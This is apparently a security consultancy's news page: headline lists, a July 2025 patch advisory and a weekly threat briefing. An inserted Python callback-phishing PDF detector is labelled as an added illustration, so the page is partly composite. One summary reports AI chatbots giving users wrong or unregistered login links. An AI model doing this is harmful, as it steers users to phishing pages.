Hackers abuse leaked Shellter red team tool to deploy infostealers
Chrome, Edge users infected by 18 malicious extensions | Cybernews
Browser hijacking campaign infects 2.3M Chrome, Edge users • The Register
Russia-linked macOS malware adds dangerous backdoor | Cybernews
200+ browser extensions make a web-scraping botnet | PCWorld
Open source has a malware problem, and it's getting worse - Help Net Security
Bots/Botnets
200+ browser extensions make a web-scraping botnet | PCWorld
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Mobile
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
The rising threat of mobile malware | Cybernews
Invisible UI flaw gives hackers full Android access | Cybernews
5 critical reasons why keeping your Android security updates current is more important than ever
How to detect and fix a jailbroken iPhone | TechTarget
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
Denial of Service/DoS/DDoS
The DDoS smoke screen: why restoring uptime may be your first mistake | TechRadar
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
Internet of Things – IoT
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Data Breaches/Leaks
Know Your Enemy: Understanding Dark Market Dynamics
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Hacker leaks Telefónica data allegedly stolen in a new breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
Qantas confirms data breach impacts 5.7 million customers
Customer, Employee Data Exposed in Nippon Steel Breach
South Korea Imposes Penalties on SK Telecom for Breach
How Worried Should Consumers Really Be After a Data Breach? - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Organised Crime & Criminal Actors
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
‘No honour among thieves’: M&S hacking group starts turf war
Know Your Enemy: Understanding Dark Market Dynamics
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US Secret Service unmasks $400M crypto scam network
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Insider Risk and Insider Threats
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S.
IT Worker arrested for selling access in $100M PIX cyber heist
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Insurance
How cyber insurers are stepping up after M&S attack - Insurance Post
Cyber insurance confronts the age of intelligent threats | Insurance Business America
Supply Chain and Third Parties
Financial firms are locking the front door but leaving the back open - Help Net Security
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Global software supply chain visibility remains critically low - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Cloud/SaaS
What Security Leaders Need to Know About AI Governance for SaaS
Google Cloud keeps AI data in UK, but not the support • The Register
Cloud security maintains its position as top spending priority - Help Net Security
Outages
Microsoft Outlook goes down around the world - here's what we know | ZDNET
Identity and Access Management
Identity attacks surge 156% as phishermen get craftier • The Register
Identity-related cyber incidents surge, report finds | SC Media
Is the UK falling behind Europe on digital identity security? | Biometric Update
Encryption
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
Linux and Open Source
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Open source has a malware problem, and it's getting worse - Help Net Security
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
SUSE launches new European digital sovereignty support service to meet surging demand | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
How passkeys work: Do your favorite sites even support passkeys? | ZDNET
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Social Media
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Regulations, Fines and Legislation
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
South Korea Imposes Penalties on SK Telecom for Breach
What CISOs Need to Know About AI Governance Frameworks | TechTarget
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
US Cyber Security at Risk Without Congressional Action
Trump seeks unprecedented $1.23 billion cut to federal cyber budget | CSO Online
Models, Frameworks and Standards
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
Why law firms should get LOCS:23 certified - Legal Futures
Data Protection
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Careers, Working in Cyber and Information Security
Cyber security’s mental health reckoning - Tech Monitor
Why your security team feels stuck - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
Hiring trends report | Professional Security Magazine
How to Get a Job in Cyber Security | The Global Recruiter
Law Enforcement Action and Take Downs
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Teens arrested by NCA over cyber attacks on M&S, Harrods and Co-op
US Secret Service unmasks $400M crypto scam network
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
Is This Russian Basketball Player Part of a Ransomware Gang?
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Alleged Chinese hacker tied to Silk Typhoon arrested for cyber espionage
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
UK and France unite against increasing cyber threats
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Grey zone attacks are bringing conflict to Britain’s doorstep — it’s time we woke up to... - LBC
Whole of society must respond to threats bringing ‘war to the doorstep’, MPs say
Teach children how to catch Russian spies online, MPs told
Hostile activities bring war to the doorstep of each and every one of us, new report warns
Nation State Actors
China
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
North American APT Uses Exchange Zero-Day to Attack China
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Taiwan Flags Chinese Apps Over Data Security Violations - Infosecurity Magazine
Taiwan NSB Alerts Public on Data Risks from TikTok, Weibo, and RedNote Over China Ties
Chinese State-Sponsored Hacker Charged Over COVID-19 Research Theft - Infosecurity Magazine
NightEagle APT Exploits Microsoft Exchange Flaw to Target China's Military and Tech Sectors
Russia
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Teach children how to catch Russian spies online, MPs told
Russia-linked macOS malware adds dangerous backdoor | Cybernews
Russia Launches Spy Ship to Target NATO Undersea Cables — UNITED24 Media
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
A Clever Russian Phishing Attack Using Fake State Department Employees
Looking Tough: Russia Trumpets Pro-Ukraine Hacker Arrests
Russia rejects ethical hacking bill • The Register
Spyware Campaign Hits Russian Industrial Firms
Russian airports crippled as 171 Moscow flights canceled
Researchers Uncover Batavia Windows Spyware Stealing Documents from Russian Firms
Iran
UK faces rising and unpredictable threat from Iran, report warns
Rising threat of assassination and kidnap attempts by Iran in UK – Channel 4 News
Iranian ransomware crew promises big bucks for US attacks • The Register
Missiles go silent but Iran-Israel cyber war is just ramping up | Iran International
The Iran-Israel War Returns to the Shadows, for Now
North Korea
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S.
US sanctions alleged North Korean IT sweatshop leader • The Register
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
DoNot APT is expanding scope targeting European foreign ministries
TAG-140 Deploys DRAT V2 RAT, Targeting Indian Government, Defence, and Rail Sectors
Tools and Controls
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Technology outpaces security adaptation, says Bitdefender
Many companies are still failing to budget for cyber security | TechRadar
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Hackers abuse leaked Shellter red team tool to deploy infostealers
AI built it, but can you trust it? - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Cloud security maintains its position as top spending priority - Help Net Security
Cyber insurance confronts the age of intelligent threats | Insurance Business America
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Other News
Data sovereignty is now a cyber security imperative - Tech Monitor
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
Technology outpaces security adaptation, says Bitdefender
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Cyber attacks could exploit home solar panels to disrupt power grids | New Scientist
Vulnerability Management
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
5 critical reasons why keeping your Android security updates current is more important than ever
Vulnerabilities
Microsoft Patches 130 Vulnerabilities, Including Critical Flaws in SPNEGO and SQL Server
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
Invisible UI flaw gives hackers full Android access | Cybernews
Ivanti, Fortinet, Splunk Release Security Updates - SecurityWeek
AMD warns of new Meltdown, Spectre-like bugs affecting CPUs • The Register
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation
ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
Microsoft Confirms Windows 11 Update Causes Security Firewall Error
Unpatched Ruckus Vulnerabilities Allow Wireless Environment Hacking - SecurityWeek
Critical mcp-remote Vulnerability Enables Remote Code Execution, Impacting 437,000+ Downloads
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 09 July 2025 – Security Updates from Microsoft, Ivanti, Fortinet, Splunk, Adobe, and SAP
Executive Summary
Microsoft’s July 2025 Patch Tuesday addressed 137 vulnerabilities, including a publicly disclosed zero-day in SQL Server, 14 critical issues (primarily remote code execution) in Office and Windows components, and a range of privilege escalation, information disclosure, denial-of-service, and spoofing flaws affecting Office and Office Components, .NET and Visual Studio, Azure, Teams, Hyper-V, Windows BitLocker, Microsoft Edge (Chromium-based), and the Windows Cryptographic Service.
Ivanti released advisory AV25‑405 on 8 July, fixing 11 vulnerabilities across Connect Secure (ICS), Policy Secure (IPS), Endpoint Manager (EPM), and Endpoint Manager Mobile (EPMM), including high-severity flaws that impact authentication, credential decryption, and OS command injection.
Fortinet published eight security advisories covering one critical, one high, five medium, and one low severity vulnerabilities affecting FortiAnalyzer, FortiProxy, FortiOS, FortiSandbox, FortiVoice, and FortiWeb.
Splunk this week issued 12 advisories that resolve critical and high-severity flaws in third-party dependencies in Splunk SOAR, Enterprise, and DB Connect. Additionally, the company announced fixes for seven medium- and one low-severity issue in Splunk Enterprise.
Adobe announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE.
SAP announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities.
What’s the risk to me or my business?
This month’s releases cover major vendor ecosystems and include both publicly disclosed and critical vulnerabilities. Unpatched systems are exposed to information disclosure in SQL Server, remote code execution in Office and Windows, credential decryption and OS command injection in Ivanti products, command injection in Fortinet devices, vulnerable third-party packages in Splunk SOAR, the critical Adobe flaws, and insecure deserialisation in SAP, any of which can lead to full system compromise or a data breach.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated critical or high severity: in this cycle that means starting with the publicly disclosed SQL Server zero-day, the Ivanti and Fortinet fixes (products that are commonly exposed to the internet), and anything CISA has added to its Known Exploited Vulnerabilities catalogue. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on specific updates within this Microsoft Patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul
Ivanti, Fortinet, Splunk, Adobe, SAP
Further details of the vulnerabilities in affected Ivanti, Fortinet, Splunk, Adobe, SAP products:
https://www.ivanti.com/blog/july-security-update-2025
https://www.fortiguard.com/psirt
https://advisory.splunk.com/advisories/SVD-2025-0712
https://helpx.adobe.com/security.html
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025:
-Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
-You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
-90% Aren’t Ready for AI Attacks, Are You?
-Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
-Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
-Third-Party Breaches Double, Creating Ripple Effects Across Industries
-Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
-A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
-Scam Centres Expand Global Footprint with Trafficked Victims
-The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
-Many Global Execs Identify Cyber Risk as Top Concern, Beazley
-Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
-Rethinking Cyber Risk as Traditional Models Fall Short
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we begin our review with details of evolving cyber attacks that organisations should address in managing their risks. Attackers are impersonating trusted brands through phishing emails containing PDF attachments and phone numbers for fake support centres, while others are targeting the routers used in homes and small offices. The cyber risks of using AI are also developing, including AI chatbots that present malicious links to users. Attackers are successfully gaining access to victims’ data and systems through third parties the victims work with, such as the recently disclosed attack at Qantas.
We share details of other attack tactics, including those used by the highly active Scattered Spider group, the emergence of scam centres located around the world, and the use of automated scanning and mass exploitation of security flaws. We conclude with the perspective of business leaders, noting a sharp rise in executives naming cyber risk as their main concern, as over 60% of UK organisations report being affected by incidents.
We find that a key element of successful cyber security begins with a leadership team that understands and is confident in managing their own cyber risks. This requires a boardroom-level conversation on contemporary cyber risks and how to govern them proportionately. Contact us for details of our Senior Leadership Risk and Governance Workshops.
Top Cyber Stories of the Last Week
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
Cyber security experts have uncovered phishing campaigns using fake emails with PDF attachments to impersonate trusted brands like Microsoft and DocuSign. These emails coax victims into scanning QR codes or calling fake support numbers, leading to credential theft or malware installation. Attackers exploit the trust placed in phone calls and use scripted tactics to appear legitimate. Additionally, criminals are manipulating artificial intelligence responses and compromising reputable websites to direct users to malicious sites. These developments highlight how cyber criminals are combining social engineering with new technologies to broaden their attacks and undermine brand trust.
https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
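As an added illustration, and not code from Black Arrow or from the article linked above, the following Python scores a PDF attachment for the callback-phishing pattern the story describes: an impersonated brand, a charged amount, urgency wording and a phone number to call. It builds its own uncompressed sample PDFs so it runs offline; the brand and keyword lists, the scoring weights and the sample phone number are assumptions made for the example. Real attachments usually carry Flate-compressed streams, so in production you would feed text from a proper PDF parser into the same scoring logic, and a QR-code lure that is purely an image needs a QR decoder, which this example only approximates with an "image with almost no text" flag.

```python
import re
from dataclasses import dataclass, field

# Brands the report names as impersonated; extend from your own mail telemetry (assumption).
IMPERSONATED_BRANDS = ("microsoft", "docusign")
# Wording typical of the "you were charged, call us to cancel" script (assumption).
URGENCY_TERMS = ("call", "cancel", "charged", "renew", "refund", "24 hours")

PHONE_RE = re.compile(r"(?:\+?\d{1,2}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
AMOUNT_RE = re.compile(r"[$£€]\s?\d[\d,]*(?:\.\d{2})?")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
IMAGE_RE = re.compile(rb"/Subtype\s*/Image")


def build_sample_pdf(lines):
    """Build a minimal uncompressed one-page PDF (constructed test data) that draws
    each line with a Tj operator; parentheses and backslashes are escaped as the
    PDF literal-string syntax requires."""
    def esc(s):
        return s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    body = "BT /F1 12 Tf 72 720 Td " + " ".join(
        f"({esc(line)}) Tj 0 -16 Td" for line in lines) + " ET"
    pdf = (
        "%PDF-1.4\n"
        "1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        "2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        "3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj\n"
        f"4 0 obj << /Length {len(body)} >>\nstream\n{body}\nendstream\nendobj\n"
        "trailer << /Root 1 0 R >>\n%%EOF\n"
    )
    return pdf.encode("latin-1")


def literal_strings(content):
    """Return the PDF literal strings '(...)' in a content stream, in order, honouring
    nested parentheses and the common backslash escapes (octal escapes are not handled)."""
    out, i, n = [], 0, len(content)
    while i < n:
        if content[i] != "(":
            i += 1
            continue
        depth, buf, i = 1, [], i + 1
        while i < n:
            c = content[i]
            if c == "\\" and i + 1 < n:          # \( \) \\ \n \r \t
                nxt = content[i + 1]
                buf.append({"n": "\n", "r": "\r", "t": "\t"}.get(nxt, nxt))
                i += 2
                continue
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    i += 1
                    break
            buf.append(c)
            i += 1
        out.append("".join(buf))
    return out


def extract_text(pdf_bytes):
    """Pull visible text out of every uncompressed content stream."""
    pieces = []
    for stream in STREAM_RE.findall(pdf_bytes):
        pieces.extend(literal_strings(stream.decode("latin-1")))
    return "\n".join(pieces)


@dataclass
class Verdict:
    brands: list = field(default_factory=list)
    phones: list = field(default_factory=list)
    amounts: list = field(default_factory=list)
    urgency: list = field(default_factory=list)
    image_only: bool = False
    score: int = 0

    @property
    def suspicious(self):
        # A callback lure needs something to call (or a QR image standing in for the
        # link) plus at least one piece of social-engineering context.
        return (bool(self.phones) or self.image_only) and self.score >= 3


def analyse_pdf(pdf_bytes):
    text = extract_text(pdf_bytes)
    low = text.lower()
    v = Verdict(
        brands=[b for b in IMPERSONATED_BRANDS if b in low],
        phones=[m.group().strip() for m in PHONE_RE.finditer(text)],
        amounts=AMOUNT_RE.findall(text),
        urgency=[t for t in URGENCY_TERMS if t in low],
        image_only=bool(IMAGE_RE.search(pdf_bytes)) and len(text.strip()) < 40,
    )
    v.score = (2 * bool(v.phones) + bool(v.brands) + bool(v.amounts)
               + bool(v.urgency) + 2 * v.image_only)
    return v


# Constructed samples: a callback-phishing lure (fictional number) and a benign document.
LURE_PDF = build_sample_pdf([
    "Microsoft 365 Subscription Renewal",
    "Your account was charged $499.99 today.",
    "To cancel, call Billing Support on +1 (888) 555-0142 within 24 hours.",
])
BENIGN_PDF = build_sample_pdf([
    "Quarterly Newsletter",
    "Thank you for reading. Full details are on the intranet.",
])

if __name__ == "__main__":
    for name, pdf in (("lure", LURE_PDF), ("benign", BENIGN_PDF)):
        print(name, analyse_pdf(pdf))
```

Run it as a script to see both verdicts, or call `analyse_pdf` from a mail-gateway hook on each attachment. The phone number is weighted as the strongest single signal because, as the story notes, the whole lure rests on the trust people place in a phone call rather than on a clickable link.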
You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
Researchers have found that popular AI chatbots increasingly risk steering users to harmful websites, including phishing pages and malicious downloads. In a recent test, chatbots returned incorrect or unsafe login links 34% of the time, some of them on domains nobody has registered, which an attacker can simply register and turn into a phishing page that the chatbot keeps recommending. Criminals are also actively crafting convincing fake websites and content to manipulate AI-generated answers, making malicious sites appear trustworthy. As people rely more on chatbots instead of search engines, there is a growing danger that AI tools could unknowingly enable large-scale cyber attacks by providing users with fraudulent or unsafe information.
90% Aren’t Ready for AI Attacks, Are You?
Accenture’s latest report warns that 90% of organisations are unprepared to secure their AI-driven operations, with 63% stuck in an “Exposed Zone” lacking effective cyber security strategies and technical skills. As AI adoption accelerates, most firms have not implemented essential security practices, with only 22% providing policies or training for AI use and just 25% applying strong data protection measures. The research highlights that embedding cyber security from the outset is critical, as organisations with mature defences are significantly more effective at blocking advanced threats and maintaining customer trust.
https://www.helpnetsecurity.com/2025/07/03/ai-cyber-defenses/
Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Security researchers have uncovered a network of over 1,000 hacked small office and home office (SOHO) devices, known as LapDogs, which has been used in cyber espionage linked to Chinese hacking groups. The campaign targets organisations in the United States, Southeast Asia, Japan, and Taiwan, including firms in IT, real estate, and media. Attackers deploy a backdoor called ShortLeash to compromise devices and disguise their activities. Evidence suggests the campaign has been active since late 2023, with batches of attacks infecting up to 60 devices at a time, highlighting rising risks to businesses relying on poorly secured internet-connected equipment.
https://thehackernews.com/2025/06/over-1000-soho-devices-hacked-in-china.html
Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
Qantas has confirmed a cyber attack on a third-party platform used by its call centre, potentially exposing personal data of up to 6 million customers. Information such as names, contact details, birth dates and frequent flyer numbers was compromised, though financial details and passwords remain secure. The airline quickly contained the breach and is working with cyber security experts. Authorities including the Australian Cyber Security Centre have been notified. This incident highlights the rising trend of cyber attacks in Australia, where reported data breaches increased by 25% in 2024, with most caused by malicious activity such as phishing and ransomware.
Third-Party Breaches Double, Creating Ripple Effects Across Industries
A recent report highlights that breaches involving suppliers have doubled to nearly 30%, exposing a dangerous reliance on a small group of technology providers whose compromise can disrupt thousands of organisations. Despite this rising threat, many firms still rely on outdated approaches like self-assessment questionnaires, with 62% admitting that most of their suppliers do not meet their own cyber security standards. Overstretched security teams struggle to monitor these risks effectively, and without proactive incident response plans across supply chains, organisations remain vulnerable to cascading impacts from third-party cyber attacks.
https://www.helpnetsecurity.com/2025/06/30/supply-chain-cyber-risks/
Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
ReliaQuest has highlighted how ransomware groups are increasingly using automated scanning and mass exploitation of security flaws to breach organisations, with Qilin and Akira among those rapidly expanding attacks in early 2025. Poorly managed or unknown systems are prime targets, as they often remain unpatched for weeks after fixes are released, giving criminals time to automate attacks. The UK’s National Cyber Security Centre has warned that artificial intelligence will further accelerate cyber attacks by shortening the time between discovery of a weakness and its exploitation, while phishing remains a growing entry point with ransomware-linked phishing rising by 58% late last year.
https://www.infosecurity-magazine.com/news/automation-vulnerability/
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
Scattered Spider, a group of young cyber criminals, has re-emerged as a major threat to critical services including retailers, insurers, and airlines in the UK, US, and Canada. Using tactics like tricking IT staff into giving system access, they breach networks to install ransomware or steal data for extortion. Despite arrests last year, their recent surge highlights their adaptability and skill at exploiting gaps in security processes. Law enforcement and researchers warn that their loosely connected structure makes them difficult to disrupt, posing an imminent risk to organisations reliant on digital systems.
https://www.wired.com/story/scattered-spider-most-imminent-threat/
Scam Centres Expand Global Footprint with Trafficked Victims
Interpol has highlighted that online scam centres, previously concentrated in Southeast Asia, are now emerging globally, including in West Africa, Central America and the Middle East. Criminals lure victims from 66 countries with fake job offers, trafficking them into compounds where they are forced to run scams such as romance fraud. Interpol estimates hundreds of thousands are trapped in this way, often facing violence and exploitation. The scam centres made an estimated $37bn last year, and the increasing use of artificial intelligence to craft convincing adverts and scam profiles is worsening the threat, demanding urgent coordinated international action.
https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
Nearly three quarters of small and medium-sized businesses suffered a data breach or cyber attack in 2023, yet many remain overconfident in their ability to recover: in a recent report, 85% of leaders believe they could bounce back, but fewer than a third have robust security measures in place. Downtime can cost SMBs up to $427 (£313) per minute, threatening revenue and eroding customer trust. Attackers are increasingly using artificial intelligence to target vulnerabilities. It is vital for SMBs to implement tested recovery plans, clear crisis procedures, and regular data backups to minimise disruption and protect their reputation in an evolving threat landscape.
https://www.msspalert.com/perspective/the-smb-wake-up-call-downtime-dollars-and-data-loss
Many Global Execs Identify Cyber Risk as Top Concern, Beazley
Beazley’s latest report reveals a sharp rise in executives naming cyber risk as their main worry, climbing to 29% in 2025 from 26% the year before. Beazley suggests that executives are underestimating today’s unpredictable cyber risks exemplified by recent high profile attacks on major retailers. Risks include cyber warfare, third-party weaknesses, and the use of artificial intelligence to enhance ransomware attacks. While most organisations plan to boost cyber security with external experts and increased internal investment, Beazley warns that regulatory and operational challenges could undermine these efforts, leaving a dangerous gap between awareness and true readiness.
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
Recent findings show cyber attacks are causing severe business disruption, with 62% of UK organisations hit by such incidents experiencing downtime and 54% facing ransom demands. Losses from recent attacks on major retailers may exceed £440 million, highlighting the rising costs and reputational risks. As attacks become more advanced and regulators demand stronger oversight, boards must treat cyber security as a critical business issue. Continuous testing of systems using real-world attack techniques is recommended to uncover vulnerabilities proactively, helping organisations strengthen their defences and meet growing expectations for responsible cyber risk management.
Rethinking Cyber Risk as Traditional Models Fall Short
Traditional models for assessing cyber risk are struggling to keep pace with modern threats as organisations become more interconnected and attackers more sophisticated. Current methods often overlook supply chain weaknesses and everyday threats that can cause serious disruptions, focusing instead on outdated scenarios or only the largest vendors. Experts are calling for more proactive, data-driven approaches that consider overlooked suppliers, economic impacts, and the growing use of remote working.
https://www.darkreading.com/cyber-risk/rethinking-cyber-risk-traditional-models-fall-short
Governance, Risk and Compliance
10 tough cyber security questions every CISO must answer | CSO Online
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Rethinking Cyber Risk as Traditional Models Fall Short
Many global execs identify cyber risk as top concern -- Beazley | Insurance Business America
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence | Pressat
Beazley Report: Executives Misjudge Cyber Preparedness
The CISO evolution: From security gatekeeper to strategic leader | TechTarget
How CISOs Can Manage and Reduce Compliance Fatigue
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now | WIRED
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Automation and Vulnerability Exploitation Drive Mass Ransomware Breach - Infosecurity Magazine
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
